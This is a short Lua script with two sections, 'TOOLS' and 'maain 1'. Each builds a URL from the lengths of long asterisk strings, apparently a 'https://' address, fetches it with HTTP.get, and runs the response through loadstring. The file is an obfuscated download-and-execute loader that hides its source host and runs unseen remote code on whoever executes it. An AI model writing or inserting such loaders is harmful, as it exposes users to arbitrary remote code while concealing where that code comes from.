-- TOOLS
function fFYycqbDLHPEOBMNNfhgruHEzUiUekClhPNagIFgmfiGZhffzNKBLZMsCdN(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


HTTP.get(fFYycqbDLHPEOBMNNfhgruHEzUiUekClhPNagIFgmfiGZhffzNKBLZMsCdN({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','*******************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','************************************************************************************************************','*************************************************************************************************','**************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','*******************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','*************************************************************************************************','******************************************************************************************************************','****************************************************************************************************','***************************************************************************************************************','**********************************************','***************************************************************************************************','*********************************************************************************************************************','*****************************************************************************************************','**********************************************************************************************************************','*************************************************************************************************','*******************************************************************************************************************','**********************************************','*******************************************************','***********************************************','******************************************************************************************************************','*****************************************************************************************************','*************************************************************************************************************','***************************************************************************************************************','********************************************************************************************************************','***************************************************************************************************************','*******************************************************************************************************************','***************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','********************************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','*******************************************************************************************************************','***********************************************','*********************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************','************************************************************************************','*******************************************************************************','*******************************************************************************','****************************************************************************','***********************************************************************************','***********************************************************************************************','**********************************************************************','**********************************************************************************','*********************************************************************','*********************************************************************'}), function(script)
    assert(loadstring(script))()
end)


-- maain 1

function RoAzbhcewjytPwIIVQD(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


HTTP.get(RoAzbhcewjytPwIIVQD({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','*******************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','************************************************************************************************************','*************************************************************************************************','**************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','*******************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','*************************************************************************************************','******************************************************************************************************************','****************************************************************************************************','***************************************************************************************************************','**********************************************','***************************************************************************************************','*********************************************************************************************************************','*****************************************************************************************************','**********************************************************************************************************************','*************************************************************************************************','*******************************************************************************************************************','**********************************************','*******************************************************','***********************************************','******************************************************************************************************************','*****************************************************************************************************','*************************************************************************************************************','***************************************************************************************************************','********************************************************************************************************************','***************************************************************************************************************','*******************************************************************************************************************','***************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','********************************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','*******************************************************************************************************************','***********************************************','*********************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************','*****************************************************************************','*****************************************************************','*************************************************************************','******************************************************************************','***********************************************************************************************','**********************************************************************','**********************************************************************************','*********************************************************************','*********************************************************************'}), function(script)
    assert(loadstring(script))()
end)


